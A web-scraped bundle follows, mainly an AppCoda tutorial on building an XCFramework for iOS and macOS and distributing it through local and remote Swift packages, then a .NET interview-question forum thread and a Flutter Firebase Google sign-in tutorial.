In the default implementation of the first method, the method first tries to load the contents of the XIB file given as an argument. If for some reason that fails, it returns false. Otherwise, it adds the top level view loaded from the XIB as a subview to the current view object that adopts the XIBLoadable protocol, and sets the necessary auto layout constraints. It's marked with the @discardableResult attribute in case the result value of the method doesn't need to be used.

The second method simply adds the view using the XIBLoadable protocol to the given view as a subview, and snaps it to all of the parent view's edges by setting the auto layout constraints using the matching anchors. The implementation of the source code in the XIBLoadable-iOS framework is now done.

With all the above now in place, let's do the same in a new framework that will be targeting the macOS platform.

The XIBLoadable-macOS Framework

We're going to repeat the above steps here in order to create the macOS-based framework, but since they have all already been presented, this part is going to be faster than before. So, start with another new project in Xcode, but this time make sure to choose the macOS platform, and then the Framework template in the Framework & Library section. In the next step, fill in the product name field with the XIBLoadable-macOS value. Eventually, save the new project to disk, in the same subfolder where you stored the XIBLoadable-iOS project. Doing so will better help follow the steps coming up next.
With the new project ready, press Cmd+N and create a new Swift file. Once again, even though the file name is not important, name it XIBLoadable just for convention and to align with what we've already done.

Similarly to what we previously did, start by replacing the default import statement with an import of AppKit. AppKit is the counterpart framework of UIKit on macOS, and as we needed UIKit in order to work with UIView, here we need AppKit to work with NSView.

Let's add the XIBLoadable protocol definition now, with the exact same two methods as before, followed by the protocol's extension with the default implementation of the methods. The way to load XIB contents on macOS is slightly different compared to iOS, but the final result remains the same: the first method loads the first top level view it finds along with its contents in the given XIB file, and adds it as a subview to the view object that adopts the XIBLoadable protocol.

Note: To find out more about this method and about how to create custom views on macOS, please read this macOS tutorial.

The implementation of the second protocol's required method is identical to the equivalent one in the previous part. The only difference is that instead of using the UIView class, we're using NSView. The source code implementation is now complete on the macOS-based framework too. In the next step we're going to archive both frameworks using Terminal, and after that we'll eventually build the single XCFramework that will contain all the above.

Archiving The Frameworks

As just said, the next step in the flow is to archive both frameworks created previously, like any other project that we usually archive in Xcode. However, we'll use Terminal for doing that; it's the recommended way to make it possible later to build the XCFramework. Regarding the iOS-based framework, we're going to create two different archives.
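Before archiving, here is a sketch of the macOS variant just described, mirroring the iOS version. As before, this is a reconstruction; the exact signatures are assumptions.

```swift
import AppKit

public protocol XIBLoadable {
    @discardableResult func load(from xibName: String) -> Bool
    func add(to parentView: NSView)
}

extension XIBLoadable where Self: NSView {
    @discardableResult
    public func load(from xibName: String) -> Bool {
        // On macOS the XIB's top level objects come back through an inout NSArray.
        var topLevelObjects: NSArray?
        guard Bundle.main.loadNibNamed(xibName, owner: self, topLevelObjects: &topLevelObjects),
              let xibView = topLevelObjects?.first(where: { $0 is NSView }) as? NSView
        else { return false }

        // Add the first top level view found as a subview, pinned to all edges.
        addSubview(xibView)
        xibView.translatesAutoresizingMaskIntoConstraints = false
        NSLayoutConstraint.activate([
            xibView.topAnchor.constraint(equalTo: topAnchor),
            xibView.bottomAnchor.constraint(equalTo: bottomAnchor),
            xibView.leadingAnchor.constraint(equalTo: leadingAnchor),
            xibView.trailingAnchor.constraint(equalTo: trailingAnchor)
        ])
        return true
    }

    public func add(to parentView: NSView) {
        // Identical to the iOS version, with NSView in place of UIView.
        parentView.addSubview(self)
        translatesAutoresizingMaskIntoConstraints = false
        NSLayoutConstraint.activate([
            topAnchor.constraint(equalTo: parentView.topAnchor),
            bottomAnchor.constraint(equalTo: parentView.bottomAnchor),
            leadingAnchor.constraint(equalTo: parentView.leadingAnchor),
            trailingAnchor.constraint(equalTo: parentView.trailingAnchor)
        ])
    }
}
```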
One archive will work on real iOS devices, and one will work in the Simulator. The process of creating the two archives will be almost identical; as you'll see, only minor changes are needed to generate the Simulator archive.

In Finder, select the XIBLoadable-iOS project folder and right click on it. Then go to the menu Services > New Terminal at Folder. This will open a new Terminal window with the path already set to the iOS-based framework folder.

Before archiving the framework, let's create another folder where we'll output the archived frameworks, as well as the final XCFramework. Normally that's not mandatory; all new archives are saved in the /Users/username/Library/Developer/Xcode/Archives folder by default. However, working with custom folders here will serve the overall educational purpose of the tutorial and make the Terminal commands easier to use. We'll create that new folder as a subfolder of the one that contains the XIBLoadable-iOS and XIBLoadable-macOS projects. You can do that either in Finder, or with the command mkdir ../output in Terminal. The "../" points to the parent folder in the folder hierarchy, and the "output" name follows right after.

Now we can use the xcodebuild archive command to create the archive meant for actual iOS devices. In the series of options given to the command, notice that:

- The destination option specifies the target platform and devices.
- The path to the folder that the archive will be stored in is specified with the archivePath option.
- We set the SKIP_INSTALL and BUILD_LIBRARY_FOR_DISTRIBUTION settings to NO and YES respectively, and it's really crucial not to skip them. The first one installs the framework in the archive that will be created, while the second one makes all the necessary configuration so that the framework written in the archive is distributable.
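Putting those options together, the archive commands for the three destinations described here and in the following paragraphs might look like this. The scheme names and archive paths are assumptions based on the project names used in this post.

```shell
# Archive for real iOS devices (run inside the XIBLoadable-iOS project folder).
xcodebuild archive \
    -scheme XIBLoadable-iOS \
    -destination "generic/platform=iOS" \
    -archivePath ../output/XIBLoadable-iOS \
    SKIP_INSTALL=NO \
    BUILD_LIBRARY_FOR_DISTRIBUTION=YES

# Archive for the iOS Simulator; only the destination and archive path change.
xcodebuild archive \
    -scheme XIBLoadable-iOS \
    -destination "generic/platform=iOS Simulator" \
    -archivePath ../output/XIBLoadable-iOS-Sim \
    SKIP_INSTALL=NO \
    BUILD_LIBRARY_FOR_DISTRIBUTION=YES

# Archive for macOS (run inside the XIBLoadable-macOS project folder).
xcodebuild archive \
    -scheme XIBLoadable-macOS \
    -destination "generic/platform=macOS" \
    -archivePath ../output/XIBLoadable-macOS \
    SKIP_INSTALL=NO \
    BUILD_LIBRARY_FOR_DISTRIBUTION=YES
```

These commands require Xcode's command line tools and the projects set up as described, so treat the paths as placeholders to adapt.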
Note that both of these settings can also be set in Xcode, in the Build Settings tab of the project target, but specifying them here guarantees that they'll work as expected. Press the Return key once you type or paste the command in Terminal to execute it. The backslash character ("\") makes it possible to break the command parameters into multiple lines, making the command more readable.

After a few moments and a bunch of output to Terminal, you should see the XIBLoadable-iOS archive created in the output folder. Now let's create the archive for the iOS Simulator destination. The Terminal command is pretty much the same; the destination and the archive path are the two things that change. You should then see two archives in the output folder.

Let's do the same for the macOS-based framework. Here we'll generate one archive only. First though, let's change the working folder and jump into the XIBLoadable-macOS folder that contains the respective framework. Similarly as before, an xcodebuild archive command creates the archive for this framework; once again, we change the destination and archive path as necessary. When archiving is finished, the archives folder should contain three archives.

With the archives generated, we can now move on to building the desired XCFramework. But first, let's examine them a bit.

Building The XCFramework

An archive is a package of files, and it can be opened in order to see what it contains. You can choose any of the three archives we created, right click on it, and select the Show Package Contents option from the context menu. The framework we want to reach in each package is under the Products > Library > Frameworks folder. And guess what: a framework is actually a folder that contains other files and subfolders. In Terminal, accessing the framework inside a package is like accessing any other normal folder.
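Concretely, listing a framework's contents and then building the XCFramework, as described next, might look roughly like this. The archive names match the archivePath values used earlier, while the framework names inside the archives (with underscores, since Xcode replaces dashes in module names) are assumptions.

```shell
# Run from inside the output folder.
# List the framework's contents inside the iOS device archive.
ls XIBLoadable-iOS.xcarchive/Products/Library/Frameworks/XIBLoadable_iOS.framework

# Build the XCFramework from the three archived frameworks.
xcodebuild -create-xcframework \
    -framework XIBLoadable-iOS.xcarchive/Products/Library/Frameworks/XIBLoadable_iOS.framework \
    -framework XIBLoadable-iOS-Sim.xcarchive/Products/Library/Frameworks/XIBLoadable_iOS.framework \
    -framework XIBLoadable-macOS.xcarchive/Products/Library/Frameworks/XIBLoadable_macOS.framework \
    -output XIBLoadable.xcframework
```

Adapt the paths if your archive or scheme names differ.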
For example, we could list the framework's contents in the XIBLoadable-iOS archive. Such a command assumes that we're already inside the output folder, so change the working directory to the output directory first. We'd need to do so anyway in order to build the XCFramework.

Creating the XCFramework is just a matter of a simple command in Terminal: xcodebuild -create-xcframework. The provided options must contain two things:

- The path to each framework; in this case it's going to be the path to the framework inside each package, as just said right above.
- The output folder where the XCFramework is going to be written. Here it's going to be the output folder.

A few moments after pressing the Return key, the XCFramework will show up in the output folder, along with the archives created previously. If you expand or open it, you'll see that all three frameworks for each destination are contained in it. After a small number of steps, we eventually managed to achieve our first goal in this post: to create the XCFramework that contains the other two frameworks for three different destinations; iOS devices, iOS Simulator and macOS systems.

With the XCFramework now available, let's give it a spin before we pass to the creation of a Swift package that we'll use to distribute and share the new framework.

Trying Out The Built XCFramework

Time to use the starter projects you downloaded earlier. Open the LoadableViewDemo-iOS project in Xcode first, in order to test the XCFramework we just built on the iOS platform. At first, select the project in the Project navigator, and then open the General tab. Place Finder next to Xcode, and then drag and drop the XIBLoadable.xcframework folder into the Frameworks, Libraries, and Embedded Content section in Xcode.
You'll notice that a new group called Frameworks has been created in Xcode automatically, and it contains the framework that we just dragged into it. Next, press Cmd+B to build the project once, and then open the DemoView.swift file. Right below the existing import statement, add an import of the XIBLoadable_iOS module. While typing it, you'll see that Xcode suggests it automatically.

Note: If there's no auto-completion in Xcode, then you might need to close and restart it.

Then, update the DemoView class header so it adopts the XIBLoadable protocol. The DemoView class has a XIB counterpart file that we want to load contents from. Let's do so in the init() method using the load(from:) protocol method, passing the "\(Self.self)" argument, which provides the name of the current class as a String value. Instead of that, we could have explicitly specified the XIB name to use.

Switching to the ViewController.swift file now, let's go to the viewWillAppear(_:) method to initialise the demoView object that's already declared in the ViewController class. In fact, not only will we make the initialisation, but we'll also call the add(to:) protocol method through demoView in order to add that view to the root view of the view controller and set its constraints automatically.

The moment of truth has finally come. For starters, let's run the app in the Simulator and see if the DemoView contents will appear on screen. Seeing that it's working in the Simulator, let's run it on an actual device to see if it'll work there too. And yes, it works on the device as well!

Finally, we're left to test it on the LoadableViewDemo-macOS demo app too. Open it in Xcode, and follow the procedure described above to add the XIBLoadable.xcframework to the Frameworks, Libraries, and Embedded Content section, in the General tab of the project target. After doing so, press Cmd+B to build the project once.
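As a recap of the iOS side before continuing with the macOS demo, the wiring described above might look roughly like this. The class names come from the demo project, while the module name and initialiser details are assumptions.

```swift
import UIKit
import XIBLoadable_iOS  // module name assumed from the framework name

class DemoView: UIView, XIBLoadable {
    init() {
        super.init(frame: .zero)
        // "\(Self.self)" resolves to the class name, i.e. "DemoView",
        // so the XIB with the matching name is loaded.
        load(from: "\(Self.self)")
    }

    required init?(coder: NSCoder) {
        super.init(coder: coder)
    }
}

class ViewController: UIViewController {
    var demoView: DemoView!

    override func viewWillAppear(_ animated: Bool) {
        super.viewWillAppear(animated)
        demoView = DemoView()
        // Adds the view to the controller's root view and sets its constraints.
        demoView.add(to: view)
    }
}
```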
Then, open the DemoView.swift file, and add the XIBLoadable import right below the import Cocoa statement. As in the iOS project, Xcode recognises and auto-suggests the proper framework to use; in this case, XIBLoadable_macOS. Then, adopt the XIBLoadable protocol, and finally, in the init() method, load the XIB file's contents.

Open the ViewController.swift file, and in the viewWillAppear() method initialise the demoView object exactly as before, then add it to the root view of the view controller. Press Cmd+R to run the app.

The XCFramework is working as it's supposed to, so let's focus on the second goal of this post: to create a Swift package that will be used to easily distribute the XCFramework and add it as a dependency to a project.

Binary Framework In A Swift Package

We've already talked about Swift packages a couple of times in the past. In particular, we've posted a hands-on tutorial on how to create a Swift package (which I recommend you read if you haven't done so), and how to reuse SwiftUI views with Swift packages. So here I won't stick to the details of making a Swift package; instead, I'll take it as granted that you have a basic knowledge about it. In case you want to make yourself comfortable with Swift packages, then check out the first link I just provided and then keep reading here.

Up until Xcode 12, Swift packages had been useful for distributing and sharing source code that was visible to everyone. A Swift package was definitely not the ideal way to distribute closed-source projects and binary code, but all that has changed with Xcode 12. As of that version, packages can be the vessel for distributing binary code, and to be precise, binary frameworks in the XCFramework format, just like the one we created right above. Usually Swift packages exist in remote repositories, such as on GitHub.
Now that binary frameworks can be contained in them, a package's checkout time might increase considerably depending on the size of the framework. In order to avoid that, frameworks can be hosted on other servers, compressed as zip archives. A URL to the framework is what is actually needed in such cases, without it being necessary for the framework to be contained in the package.

All that regards remote packages with binary frameworks residing remotely as well. However, it's also possible to keep and use both the Swift package and the framework from a local path, and that is usually the preferred approach while still in the development stage. In that case things are a bit different: the binary framework must be included in the package, on top of any configuration required in the package's manifest file.

A Local Swift Package

We'll start from the second case that was just described above, and we'll see how to configure a Swift package that uses the binary framework from a local path. Before creating the package though, let's begin from a different point: let's make a copy of the XIBLoadable.xcframework first. Although not mandatory, we'll do it deliberately here for one simple reason: to keep the original instance of the binary framework in the output folder. By adding the framework to the package right next, the entire framework folder will move to the package's folder and will no longer exist in its current location. However, I'd like us to have it in the output folder as well, because we'll need it again in order to demonstrate the steps for creating a remote Swift package and framework.

So, back in Terminal, make sure that you're still in the output folder. Then duplicate the XIBLoadable.xcframework folder, temporarily giving the copy the XIBLoadablePackage.xcframework name. We'll rename it back properly when we add it to the Swift package next. Let's return to Xcode.
Go to the File > New > Swift Package… menu to initiate the creation of a brand new Swift package, and name it XIBLoadableLocal. You are strongly advised to store it in the same subfolder where you have the output folder, as well as both the XIBLoadable-iOS and XIBLoadable-macOS framework projects. This will help a lot when working with paths in Terminal later.

Once it's ready, and before we add the binary framework to it, we can delete almost all files created by default; we don't need them, but it's okay even if you leave them untouched. I choose to delete them here so we have a clean package, so select the Tests folder and delete it entirely. Then, delete the XIBLoadableLocal folder under Sources, and let Sources be the only folder you are seeing in the package. After that, drag and drop the XIBLoadablePackage.xcframework from the output folder in Finder into the Sources folder in Xcode. Then rename it back to its original name, XIBLoadable.xcframework.

Now open the Package.swift file; the package's manifest file, where we'll specify the binary framework as a target. At first, go to the targets array and delete all the default content you'll find there. Then add a binaryTarget entry instead; note that the path to the XCFramework is relative to the root path of the package. Besides that, it's also necessary to update the targets argument in the library(name:targets:) method right above, and provide XIBLoadable as the target name for the library that the package will produce.

Testing The Swift Package With The Local Binary Framework

Open the LoadableViewDemo-iOS project in Xcode, and at the same time close the XIBLoadableLocal Swift package. Select the project name in the Project navigator, go to the General tab, and under the Frameworks, Libraries, and Embedded Content section select the XIBLoadable.xcframework framework and then click the minus button to remove it.
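For reference, the complete manifest described a moment ago might look like this. It is a sketch: the tools version line is an assumption (binary targets require Swift tools 5.3 or later).

```swift
// swift-tools-version:5.3
import PackageDescription

let package = Package(
    name: "XIBLoadableLocal",
    products: [
        // The library vends the binary target defined below.
        .library(name: "XIBLoadable", targets: ["XIBLoadable"])
    ],
    targets: [
        // The path is relative to the package root.
        .binaryTarget(name: "XIBLoadable", path: "Sources/XIBLoadable.xcframework")
    ]
)
```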
In addition, delete the XIBLoadable.xcframework item from the Project navigator, under the Frameworks group. When asked, click on the Remove Reference button so the binary framework won't be deleted from its original location.

Once you do all that, place Finder and Xcode side by side, and drag and drop the XIBLoadableLocal package folder onto the Project navigator. Then, in the General tab again, press the plus button in the Frameworks, Libraries, and Embedded Content section, and in the sheet that appears choose to add the XIBLoadable library. Without making any other change, either build the project to ensure that no errors exist, or run it straight away, either in the Simulator or on a device. If everything runs as before, then congratulations: you just managed to use the local Swift package as a dependency with the binary framework embedded in it, instead of having the framework added to the project alone. Feel free to follow the same steps as above and use the Swift package in the LoadableViewDemo-macOS project as well.

Remote Swift Package With Remote Binary Framework

As I've already said, the Swift package and the binary framework don't have to exist in the same remote location when they're not meant to exist locally. The XCFramework can be hosted on a server, and the Swift package can exist in a remote repository. Let's see that case, so let's work our way in that direction. After all the necessary configuration to the Swift package is made, we'll upload it to a private repository on GitHub so we can add it as a remote dependency later. The binary framework will also be uploaded to a remote server. The recommended choice is your own personal or company server, but for testing purposes you can even store it on a local server, if you're running one. There's a particularity we have to watch out for here: the remote server should not contain the framework's folder as is, but compressed as a zip file.
Actually, in order to avoid encountering any errors in Xcode later on, avoid cloud services that don't return a share link with the zip extension at the end of the URL. That's why a custom server is usually the best approach.

Having said that, bring Terminal to the front and, supposing that you're still in the output folder, compress the XIBLoadable.xcframework folder into a zip archive. The XIBLoadable.xcframework.zip file should now be listed along with everything else in the output folder.

Let's create a new Swift package now, which we'll call XIBLoadableRemote. Since we've already done that in the previous part, please follow all the steps described there, including the default files clean up as well as deleting the predefined targets in the Package.swift file, and updating the library(name:targets:) parameter values with the XIBLoadable value.

In the targets array now, we'll add another method called binaryTarget(name:url:checksum). There are three parameter values we have to provide here:

- The name of the framework. This will be the same as before, XIBLoadable.
- The URL to the remote framework zip file.
- The checksum of the framework zip file. Using it, Xcode will be in a position to verify the downloaded framework's archived file.

To calculate the checksum, go one last time to Terminal and first change the working directory to the root folder of the Swift package (that's why I advised you earlier to save the Swift package along with output and the other folders, so as to make it easy here). Then, run the swift package compute-checksum command, providing the relative path to the zip file. A few moments later you will see the checksum showing up in Terminal. It'll be something like this:

8580a0031a90739830a613767150ab1a53644f6e745d6d16090429fbc0d7e7a4

Now it's a good time to upload the XIBLoadable.xcframework.zip file to the server. Do that and come back to keep reading.
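The two Terminal steps just described might look like this. The relative paths assume the folder layout used throughout the post.

```shell
# From inside the output folder: compress the XCFramework for hosting.
zip -r XIBLoadable.xcframework.zip XIBLoadable.xcframework

# From the root folder of the XIBLoadableRemote package:
# compute the checksum Xcode will use to verify the downloaded archive.
swift package compute-checksum ../output/XIBLoadable.xcframework.zip
```

The compute-checksum subcommand is available as of Swift 5.3, matching the Xcode 12 requirement mentioned earlier.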
Don't forget to have the URL to the remote location of the archived framework handy when you come back. Having at this point the remote URL and the checksum available, let's head back to Xcode in order to specify what the remote binary target is. This time we'll use the binaryTarget(name:url:checksum) method in the targets array: As a reminder, make sure that the above URL ends with the zip extension, otherwise you'll encounter errors in Xcode. The new Swift package has been configured, so now we'll push it to a remote, private repository on GitHub. To continue, it's necessary to have a GitHub account, or alternatively, a Bitbucket account to use instead. The detailed steps to do that task in Xcode have been thoroughly described in this tutorial, even though Xcode 12 introduces some changes to the naming of certain functionalities. Regardless, the overall process remains the same, and here I'm going to present the steps really briefly. So, let's walk through them. At first, go to the Source Control > New Git Repositories… menu in Xcode. In the window that shows up make sure that the XIBLoadableRemote package is selected and click Create. This action creates a local repository and commits the package. Then, to create the remote repository:
- Open the Source Control navigator (Cmd+2).
- Right click on the XIBLoadableRemote repository to show the context menu.
- Select the New "XIBLoadableRemote" Remote… menu option.
- In the new window that appears, either select an existing GitHub account or create one. Also, select the Private radio button to keep the repository private. Leave the repository name as is and click Create.
To push the package version to the remote repository:
- In the Source Control navigator again, right click on the XIBLoadableRemote repository to show the context menu.
- Select the Tag "main"… option.
- In the next window set the version number; 1.0.0 is okay here. No need to type a message, so click Create.
- Open the Source Control > Push… main menu in Xcode.
- Check the Include tags checkbox and click Push.
The Swift package now exists remotely on GitHub (or any other service you might be using), so we can finally test whether it's working properly or not.

Testing The Remote Swift Package

While still in Xcode, close the XIBLoadableRemote package and open the LoadableViewDemo-iOS project. If you still have the XIBLoadableLocal package added to the project, then simply right click on it in the Project navigator and choose the delete option. However, in the confirmation alert, make sure to click on the Remove Reference button, so the Swift package won't be deleted from the disk too. Next, let's add the remote package we configured right above as a dependency to the project. Go to the File > Swift Packages > Add Package Dependency… menu option, and either choose the new package repository if it's automatically listed there, or just type the URL to it so it's fetched. Continue to the next steps until the overall process is finished; just make sure that the XIBLoadable package product is selected in the last step. In the end, you'll see that a new section named Swift Package Dependencies shows up in the Project navigator. In it you'll see the XIBLoadableRemote Swift package that contains the XIBLoadable binary framework under a special group called Referenced Binaries. At this point we're all set, and we can run the app once again to make sure that it's working. In case you get any error messages, make sure that the XIBLoadable library is listed under the Frameworks, Libraries, and Embedded Content section in the General tab of the target settings. Otherwise, go through all the steps presented above and ensure that you haven't skipped any.

Conclusion

Getting to the end of this post, there's a confession I'd like to make; this is one of the tutorials that I enjoyed writing the most, as it's about stuff that's not only interesting, but also quite useful.
If you ever tried to create a binary framework that was supposed to be working in both iOS devices and the Simulator, then you can definitely appreciate the significance of the XCFramework format. But even if you did not, you can still recognise how important the ability to bundle up framework variants in one single place is, and eventually use and distribute just that. And if you’re a Swift package fan like I am, then you have all the reasons to feel happy with the marriage of XCFrameworks and Swift packages, regardless of whether you’re sharing code with others or you’re creating your own, personal library of reusable components. I really hope you found this post helpful, and that there’s something new you learnt here today. And with that I leave you, so, take care! For reference, you can download the full project on GitHub.
https://www.appcoda.com/xcframework/
A helper from the maze-solver article maps a cell (ithIndex, jthIndex) of the maze matrix to a node number:

int GetNodeNo(int[,] matrix, int ithIndex, int jthIndex)
{
    return (ithIndex * matrix.GetLength(1) + jthIndex);
}

The node number of the left neighbour is iLeft = iCurrent - 1; before using it, we have to make sure that this node number is valid.
http://www.codeproject.com/Articles/9040/Maze-Solver-shortest-path-finder?msg=1040735
Microsoft at one of their international locations asks these questions. 1. What is an interface and what is an abstract class? Please, expand by examples of using both. Explain why. 2. What is serialization, how does it work in .NET? 3. What should one do to make a class serializable? 4. What exactly is being serialized when you perform serialization? 5. Tell me about the methods you have used to perform serialization. 6. Did you work with XML and XSL Transformations? 7. What methods did you use to work with XML, and what for? 8. What is the purpose of the reserved word "using" in C#? 9. How does output caching work in ASP.NET? 10. What is connection pooling and how do you make your application use it? 11. What are the different methods of session maintenance in ASP.NET? 12. What is Viewstate? 13. Can any object be stored in a Viewstate? 14. What should you do to store an object in a Viewstate? 15. Explain how Viewstate is formed and how it's stored on the client. 16. Explain the control life cycle, mind the event order. 17. What do you know about ADO.NET's objects and methods? 18. Explain the DataSet.AcceptChanges and DataAdapter.Update methods. 19. Assume you want to update a record in the database using ADO.NET. What necessary steps should you perform to accomplish this? 20. How do you retrieve the value of the last identity that has been inserted in a database (SQL Server)? Answers: 1. Answers: 1). 2. 1) What is the use of Web.config in ASP.NET? Give one example. 2) Please tell me how to code for updating & downloading a file. Give one example. 3. This link might help to solve the 2nd and 3rd questions. 4. Question 1: What is an interface and what is an abstract class? Please, expand by examples of using both. Explain why. Answer. 5. Hi, I want to know how we can convert a report file into an Acrobat (PDF) file, or a Word file, for transport purposes over the internet. Please go through the following link as well;EN-US;q169470 7.
What is the difference between compile time and runtime? 8. Abstract vs Interface. All abstract methods are virtual by default. They have to be overridden. Interface methods are not virtual by default. When you are implementing an interface method you can decide whether you want it to be virtual or not. 9. To make a class serializable, mark it with the Serializable attribute as follows:

[Serializable]
public class MyObject
{
    public int n1 = 0;
    public int n2 = 0;
    public String str = null;
}

What exactly is being serialized when you perform serialization? The object's state (values). The DataSet.AcceptChanges method commits all the changes made to this row since the last time AcceptChanges was called. Tech Interviews comment by Akantos 10. WILL U PLS TELL ME ALL OBJECTS IN ASP.NET. URGENT. Tech Interviews comment by Gyan 11. Question 1: in C# you can't have multiple inheritance, so you have to use interfaces to accomplish it. 12. Can anyone tell me which language to use (VB.NET or C#) when all languages are equal in the .NET world? 13. Hi Harshad, regarding your question about which language to use: according to me you can go ahead with either language; both C# and VB.NET are the same in functionality (though they also have differences, which are not so important and which I think we need not be worried about). Following are a few differences between C# and VB.NET (as mentioned in MSDN): case sensitivity, variable declaration and assignment, data types, statement termination, statement blocks, use of () vs. [], operators, conditional statements, error handling, overflow checking, parameter passing, late binding, handling unmanaged code, keywords. What I feel is that it all depends on the project's requirements. In one company I was using only C# and in another only VB.NET.
One more thing: many of our friends will have different opinions about it, so let's wait for their replies. This is what I can tell you. Regards, Manish. Tech Interviews comment by manish 14. Hi gyan, everything in .NET is an object. If you can be more specific I think more people can help you. 15. One more question which troubles me a lot: reflection is used by the framework transparently, but when do we have to use it? 16. I am using the Mozilla Firefox browser. I found a few of the things listed are not working. Can anyone give me a solution? 1. When the asp:panel is used in the aspx page, Firefox doesn't support it and the layout gets distorted. Can anyone suggest a solution? 2. The onMouseout of JavaScript does not work. 3. Many properties of the IE browser seem not to work in Mozilla. Tech Interviews comment by Chandini 17. I never used smart navigation in my pages. I just went through the comments before using it; now I am not daring enough to use it in my application pages. Tech Interviews comment by ManojNair 18. Q. If the base class is an abstract class and the derived class inherits the base class, and the derived class has its own function which is not abstract, how do we use the derived class's functions, given that an abstract class cannot be instantiated? Tech Interviews comment by rajesh 19. ViewState is the mechanism by which page information is maintained between postbacks. An object can be stored in viewstate as long as the object is serializable. You can store a string, arraylist, etc. in Viewstate. 20. Viewstate is stored in the hidden field __VIEWSTATE. We can disable the viewstate at the application, page, and control levels. 21. @@IDENTITY is used to retrieve the last-inserted identity value in SQL Server. 22. Downloading and uploading: for downloading a file, use a hyperlink and specify the URL of the file as the link. For uploading a file, use the File Field control, from the HTML controls, to select the file.
Change it to run at server and use the upload or save (or something similar) method associated with it. Tech Interviews comment by Thomas 23. How to pass a datatable as a parameter to a stored procedure in Oracle? Kindly let me know; it is an urgent requirement. 24. What is the purpose of the reserved word "using" in C#? A keyword that specifies that types in a particular namespace can be referred to without requiring their fully qualified type names. 25. What is Passport security? And how does it work? 26. What is the use of the Reflection classes in .NET? Root class in .NET? 27. How to handle the date problem if the application server and the database server have different date formats?

DateTime FromDate = new DateTime(2000, 1, 1);
DateTime ToDate = DateTime.Now;
_whereClause = "";
string _frmdate = FromDate.Year.ToString() + FromDate.Month.ToString() + FromDate.Day.ToString();
string _todate = ToDate.Year.ToString() + ToDate.Month.ToString() + (ToDate.Day + 1).ToString();
_whereClause = _whereClause + " and " + "createDate between cast('" + _frmdate + "' as DateTime) and cast('" + _todate + "' as DateTime)";
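The interface-versus-abstract-class question (items 1 and 8 above) is easiest to see in a short C# sketch; the type names here are invented for illustration:

```csharp
// Abstract class: may carry state and implementation; a member is only
// overridable when declared abstract or virtual.
public abstract class Shape
{
    public abstract double Area();            // abstract: must be overridden
    public virtual string Describe()          // virtual: may be overridden
    {
        return "shape with area " + Area();
    }
}

// Interface: a pure contract with no state and no implementation
// (before C# 8 default interface methods).
public interface IDrawable
{
    void Draw();
}

// A class extends at most one (abstract) class but may implement
// many interfaces -- this is how C# works around the lack of
// multiple inheritance mentioned in answer 11.
public class Circle : Shape, IDrawable
{
    private readonly double r;
    public Circle(double r) { this.r = r; }
    public override double Area() { return 3.14159 * r * r; }
    public void Draw() { /* render the circle */ }
}
```

Here Circle must override Area() (it is abstract), may optionally override Describe(), and must supply Draw() to satisfy the IDrawable contract.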
https://www.scribd.com/document/72857/NetQuestions
Hi Guys, Welcome to Proto Coders Point. In this Flutter tutorial we will learn how to implement Google authentication in your Flutter apps using Firebase services. What you'll learn? – Login with Google – Firebase configuration – Fetching the user's profile DEMO Flutter Firebase Google SignIn | Flutter Login with Google Firebase First of all, of course, you need to create a Flutter project. I use Android Studio as my IDE to create my Flutter application; hope you guys have created your project in your respective IDEs. Now go to the Firebase console and set up your project to make use of the Google Sign-In service of Firebase.

Set-up to be made on the Firebase Console

Step 1 : Go to Firebase Console

Step 2 : Create a new project and add the project as an Android app

In your Firebase console, create a new Firebase project or open any existing project; you can create the project as shown in the screenshots below. You will then get a new window to add an app for Android, iOS, Unity, or web; check out the screenshot below to add a new app. In this tutorial we will just add an app for the Android platform.

Step 3 : Add Firebase to your Android project

How to get the package name for Android in Flutter? How to generate a SHA-1 certificate for the Firebase console? Here is a tutorial article to generate the SHA-1 certificate.

Step 4 : Download the config file (google-services.json)

Once you add the package name and SHA-1 certificate to the Firebase project, it will give you a JSON file called google-services.json that you need to add to your Flutter project under the android/app folder, as shown below.

Step 5 : Go to the Authentication option and enable the Google Sign-In provider

In the last step, go to the Authentication section on the left side of your Firebase console; you need to enable the Google Sign-In provider option to be able to log in with Google services using Firebase. OK then, now we are done with the server side, that is, connecting our Flutter project to the Firebase console.
Now let's come to the coding part.

Flutter Firebase Google Sign-In

Step 1 : Add the google_sign_in dependency

google_sign_in is a Flutter plugin for Google Sign-In. Note: This plugin is still under development, and some APIs might not be available yet. Feedback and pull requests are most welcome! In your Flutter project, open the pubspec.yaml file and add the Google Sign-In dependency to it:

dependencies:
  google_sign_in: # add this line

Step 2 : Import the google sign in dart class

import 'package:google_sign_in/google_sign_in.dart';

Step 3 : Create an instance of GoogleSignIn

GoogleSignIn googleSignIn = GoogleSignIn(scopes: ['email']);

Then, in your main dart class file, create a new instance object and give it the 'email' scope; with the scope set to 'email', only email-based sign-in is requested.

Step 4 : Login method

Now you need a login method: when the user clicks a button, a _login() method is called, which runs googleSignIn.signIn().

googleSignIn.signIn();

You just use the GoogleSignIn instance object and call its signIn method. The complete code is given below.

Step 5 : Logout method

If the user is signed in and needs to log out, you need a method by which the user can sign himself out.

googleSignIn.signOut();

You just use the GoogleSignIn instance object and call its signOut method. The complete code is given below.
Complete Code for Flutter Google Sign In

main.dart

import 'package:flutter/cupertino.dart';
import 'package:flutter/material.dart';
import 'package:google_sign_in/google_sign_in.dart';

void main() => runApp(MyApp());

class MyApp extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return MaterialApp(
      home: MyHomePage(),
    );
  }
}

class MyHomePage extends StatefulWidget {
  @override
  _MyHomePageState createState() => _MyHomePageState();
}

class _MyHomePageState extends State<MyHomePage> {
  bool isLoggedIN = false;
  GoogleSignIn googleSignIn = GoogleSignIn(scopes: ['email']);

  _login() async {
    print("Google Sign In");
    try {
      await googleSignIn.signIn();
      setState(() {
        isLoggedIN = true;
      });
    } catch (err) {
      print("Google Sign In Failed");
    }
  }

  _logout() async {
    print("Google Sign Out");
    try {
      await googleSignIn.signOut();
      setState(() {
        isLoggedIN = false;
      });
    } catch (err) {
      print("Google Sign Out Failed");
    }
  }

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(
        title: Text("Google Login"),
      ),
      body: Container(),
      bottomNavigationBar: Center(
        child: Column(
          mainAxisAlignment: MainAxisAlignment.center,
          children: <Widget>[
            isLoggedIN
                ? Column(
                    children: <Widget>[
                      Image.network(googleSignIn.currentUser.photoUrl,
                          width: 200, height: 200),
                      Text("Name : ${googleSignIn.currentUser.displayName}"),
                      RaisedButton(
                        child: Text("Log-Out"),
                        onPressed: () {
                          _logout();
                        },
                      ),
                    ],
                  )
                : RaisedButton(
                    child: Text("Sign In With Google"),
                    onPressed: () {
                      _login();
                    },
                  ),
          ],
